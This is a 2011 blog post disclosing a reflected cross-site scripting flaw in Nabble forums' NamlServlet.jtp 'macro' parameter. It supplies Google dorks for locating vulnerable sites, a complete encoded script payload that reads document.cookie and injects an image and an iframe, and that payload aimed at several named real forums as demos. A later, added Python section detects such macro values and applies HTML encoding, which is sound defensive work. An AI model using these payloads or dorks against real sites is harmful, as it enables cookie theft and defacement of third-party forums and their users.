Wednesday, 12 October 2011

Nabble Forums Cross Site Scripting

Interesting..

# Date: 13.10.2011
# Author: Sony
# Software Link: http://www.nabble.com/
# Google Dorks: inurl:NamlServlet.jtp or inurl:/template/NamlServlet.jtp?macro=
# Browser: Mozilla Firefox
# Blog : http://st2tea.blogspot.com
..................................................................

Well..
We can see an error on the page..


http://dwr.2114559.n2.nabble.com/template/NamlServlet.jtp?macro=search_page%20&node=5394489&query=xmlbeans

Our XSS is here:

template/NamlServlet.jtp?macro=search_page[XSS]%20&node=5394489&query=xmlbeans

After:

http://dwr.2114559.n2.nabble.com/template/NamlServlet.jtp?macro=search_page%20%22%3E%3C/title%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cscript%3Ealert%28%22TEST%22%29%3C/script%3E%3Cscript%3Ealert%28%22by%20Sony%22%29%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3E%3Cimg%20src=%22http://top10best.ucoz.ru/Cats1/cat1_1.jpg%22%20style=%22height:%20800px;%20width:%20950px;%22%3Ciframe%20src%20=http://www.youtube.com/watch?v=TCUaQzw707M%22%20width=%220%22%20height=%220%22%20\%3E%3C/div%3E&node=5394489&query=xmlbeans

Some demos found with Google dorks:
http://forum.nyskiblog.com/template/NamlServlet.jtp?macro=search_page%20%22%3E%3C/title%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cscript%3Ealert%28%22TEST%22%29%3C/script%3E%3Cscript%3Ealert%28%22by%20Sony%22%29%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3E%3Cimg%20src=%22http://top10best.ucoz.ru/Cats1/cat1_1.jpg%22%20style=%22height:%20800px;%20width:%20950px;%22%3Ciframe%20src%20=http://www.youtube.com/watch?v=TCUaQzw707M%22%20width=%220%22%20height=%220%22%20\%3E%3C/div%3E&node=5394489&query=xmlbeans

http://discuss.supergenpass.com/template/NamlServlet.jtp?macro=search_page%20%22%3E%3C/title%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cscript%3Ealert%28%22TEST%22%29%3C/script%3E%3Cscript%3Ealert%28%22by%20Sony%22%29%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3E%3Cimg%20src=%22http://top10best.ucoz.ru/Cats1/cat1_1.jpg%22%20style=%22height:%20800px;%20width:%20950px;%22%3Ciframe%20src%20=http://www.youtube.com/watch?v=TCUaQzw707M%22%20width=%220%22%20height=%220%22%20\%3E%3C/div%3E&node=5394489&query=xmlbeans

http://www.pcl-users.org/template/NamlServlet.jtp?macro=search_page%20%22%3E%3C/title%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cscript%3Ealert%28%22TEST%22%29%3C/script%3E%3Cscript%3Ealert%28%22by%20Sony%22%29%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3E%3Cimg%20src=%22http://top10best.ucoz.ru/Cats1/cat1_1.jpg%22%20style=%22height:%20800px;%20width:%20950px;%22%3Ciframe%20src%20=http://www.youtube.com/watch?v=TCUaQzw707M%22%20width=%220%22%20height=%220%22%20\%3E%3C/div%3E&node=5394489&query=xmlbeans

http://nabble.documentfoundation.org/template/NamlServlet.jtp?macro=search_page%20%22%3E%3C/title%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cscript%3Ealert%28%22TEST%22%29%3C/script%3E%3Cscript%3Ealert%28%22by%20Sony%22%29%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3E%3Cimg%20src=%22http://top10best.ucoz.ru/Cats1/cat1_1.jpg%22%20style=%22height:%20800px;%20width:%20950px;%22%3Ciframe%20src%20=http://www.youtube.com/watch?v=TCUaQzw707M%22%20width=%220%22%20height=%220%22%20\%3E%3C/div%3E&node=5394489&query=xmlbeans
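
For the defender's side of the reflected `macro` parameter shown above, the following added example (not from the original post and not Nabble's code) flags NamlServlet.jtp requests whose decoded `macro` value is not a plain identifier, and shows the HTML output encoding that neutralizes the reflected value. The identifier pattern for macro names, the function names and the `forum.example.test` host are assumptions.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate macro name is a plain identifier such as "search_page".
MACRO_NAME = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")
SERVLET_PATH = "/template/NamlServlet.jtp"

def check_macro(url):
    """Return (verdict, decoded_macro) for one request URL or request target.

    verdict is "ok", "suspicious", or "n/a" when the request is not a
    NamlServlet.jtp call carrying a macro parameter.
    """
    parts = urlsplit(url)
    if not parts.path.endswith(SERVLET_PATH):
        return "n/a", None
    # parse_qs percent-decodes, so %22%3E%3Cscript%3E becomes "><script>
    values = parse_qs(parts.query, keep_blank_values=True).get("macro", [])
    if not values:
        return "n/a", None
    for value in values:
        # Strict allowlist: spaces, quotes and angle brackets all fail.
        if not MACRO_NAME.fullmatch(value):
            return "suspicious", value
    return "ok", values[0]

def encode_for_html(value):
    """Output encoding to apply before echoing the value into a page."""
    return html.escape(value, quote=True)

def scan(requests):
    """Return (url, decoded_macro) for every suspicious request."""
    hits = []
    for url in requests:
        verdict, macro = check_macro(url)
        if verdict == "suspicious":
            hits.append((url, macro))
    return hits

BASE = "http://forum.example.test/template/NamlServlet.jtp"  # placeholder host
SAMPLE_REQUESTS = [  # constructed sample requests, not real log data
    BASE + "?macro=search_page&node=5394489&query=xmlbeans",
    BASE + "?macro=search_page%20%22%3E%3C/title%3E%3Cscript%3Ealert"
           "%28%22XSS%22%29%3C/script%3E&node=5394489&query=xmlbeans",
    "http://forum.example.test/index.html",
]

if __name__ == "__main__":
    for url, macro in scan(SAMPLE_REQUESTS):
        print("suspicious macro:", repr(macro), "->", encode_for_html(macro))
```

The same allowlist check belongs on the server before the macro name is used, with the encoding step applied wherever the value is written back into HTML.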
